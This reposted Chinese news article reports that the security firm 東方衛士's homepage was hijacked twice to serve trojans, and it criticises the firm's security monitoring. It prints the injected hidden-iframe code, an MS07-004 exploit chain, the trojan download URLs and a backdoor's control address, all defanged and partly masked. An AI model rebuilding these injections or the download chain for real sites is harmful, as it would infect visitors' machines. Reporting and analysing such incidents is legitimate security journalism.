東方衛士被掛馬 安全網站安全誰來保證
來源:互聯網
上載者:User
關鍵字
安全
出現
iframesrc
【編者按:為安全起見,文中「HTTP」均被替換為「hxxp」,「<>」均被替換為「[]」,特此說明。 】 前兩天有網友反映國內知名的安全網站東方衛士再次被掛載木馬,這已經是東方衛士第二次暴露出存在安全隱患。 回顧 在此之前就曾發生過一次東方衛士網站首頁(hxxp://www.i110.com)存在惡意程式碼引用的事件,如果使用者沒有安裝過微軟的MS07-004補丁程式,並且使用IE瀏覽器訪問上述頁面的話,就會感染木馬病毒。 技術分析: 1. 東方衛士網站首頁代碼中,包含了一處對惡意網頁的引用語句: [iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]如圖1: 498)this.width=498;' onmousewheel = 'javascript:return big(this)' height=316 alt="" src="/files/uploadimg/20070309/155900203.jpg" width= 551 border=0>圖12.這個被引用的惡意網頁中包含了利用MS07-004漏洞的代碼,使得系統能夠自動下載hxxp://***.ch/ xia.exe(Trojan-Downloader.Win32.agent.ddz)到本地,並運行。 3.xia.exe是個木馬下載器,該木馬複製自身到%system32%目錄下,命名為wdfmg1r32.exe,運行後下載灰鴿子病毒hxxp://***.li/2. exe(Backdoor.Win32.Hupigon.cpb)。 4.2.exe是灰鴿子病毒最新變種,採用RootKit技術編寫,隱藏進程。 它複製自身到%system32%目錄下,命名為system32.exe,該病毒運行後會釋放檔到 %WinDir%\svchost.exe,檔案大小為381440位元組,並創建下面服務: 服務名:Net work nois服務描述:Net work nois服務程式:C:\WINNT\svchost.exe另外還會下載hxxp://lxn2wyf8899.3322.org/ip.txt到本地系統臨時目錄下。 ip.txt包含的內容為: hxxp://221.215.170.192:5600/wwwroot/(該IP對應位址為:山東省青島市(李滄區)網通ADSL)染毒電腦將被駭客遠端完全控制,這些操作可能是任意檔操作、註冊表操作、鍵盤記錄、下載執行遠端程式、任意網路操作甚至遠端開機攝像頭監控等。 再次被掛馬 而這一次,在東方衛士主頁上,通過查看頁面原始程式碼,可以看到網頁中被插入一條「[ iframe src=」指令,該指令將隱藏打開一個新的頁面,這個頁面偽造了瀏覽器無法開的錯誤網頁,並在後臺隱藏打開三個頁面,進行木馬下載。 打開的隱藏頁面代碼: [iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 height=0 frameborder=0][/iframe] 在打開的偽造錯誤頁面中會打開三個網頁: [iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" height="0" frameborder="0"][/ iframe][iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"][/iframe][iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"][/iframe]下載木馬: hxxp://www.****.cn/33/ Reflector/1.exe(無效)hxxp://www.*****.com/0.exe498)this.width=498;' onmousewheel = 'javascript:return big(this)' height=333 alt="" src="/files/uploadimg/20070309/155927359.gif" width=490 border=0>圖2498)this.width=498;' onmousewheel = 'javascript:return big(this)' height=336 alt="" src="/files/uploadimg/20070309/155938359.gif" width= 491 border=0>圖3再一卻又再二,是否還會再三再四 我們常說「再一再二,不可再三再四」。 作為防護先鋒的安全網站,其在使用者心目中的可信度、影響度都是極高的,他們任何一次疏忽所帶來的危害性都遠大於木馬病毒自身所造成的破壞。 第一次發生網站被掛載木馬的事件後,相信東方衛士應該已經採取了相應的措施。 但掛馬事件卻能夠再次發生,這就需要引起我們的警惕與反思了。 再次掛馬,說明在「矛」與「盾」的鬥爭中,「矛」又一次的佔據了上風。 同時,東方衛士網站一而的再被掛馬,除了系統自身依然存在尚未發現的漏洞外,其在自身網站的安全監控上也應當還存在著一定的、可被利用的缺陷。 在以前的文章中我們曾提到CNN由於未能及時更新它的防毒軟體,遭到了一種「本可以被及時檢測到」蠕蟲病毒的攻擊。 「矛」與「盾」永遠都是並存的,不可能出現某一個完全蓋過另一個的情況,只能是或者二者並存、或者二者同消失。 也就是說,二次掛馬事件的出現,除了是因為出現了新的「矛」,更是因為「盾」的上面再一次出現了漏洞,給了「矛」以可乘之機。 有則改之,出現了問題並不可怕,怕的是不知道這個問題是如何出現的,怕的是我們不知道如何去防範、避免問題的再次出現。 安全網站它代表的不僅僅是一個公司、一個集團,它更是網路安全鬥爭的最前沿。 當它連自身的安全都無法保證時,又讓普通使用者去如何面對日趨危險的網路世界,又讓普通使用者去如何知道除了自己還有誰能來説明他抵禦網路威脅的入侵。 當安全網站也被擊倒了,我們還能信任誰! 安全網站的安全誰來保證? 相關資料 MS07-004漏洞:是Microsoft公司多個版本的作業系統對向量標記語言(VML)的支援存在整數溢出,導致可以執行任意指令,使的遠端攻擊者可以利用此漏洞控制使用者機器。 東方衛士:交大銘泰資訊安全公司,國內知名資訊安全廠商,該公司提供《東方衛士》系列防病毒產品、資料保護、無毒閘道產品、防垃圾郵件產品、網路設備及系統集成和 OEM 定制服務。 【責任編輯:雪花 TEL:(010)68476606-8008】 給力(0票)動心(0票)廢話(0票)專業(0票)標題党(0票)路過(0票) 原文:東方衛士被掛馬 安全網站安全誰來保證 返回網路安全首頁
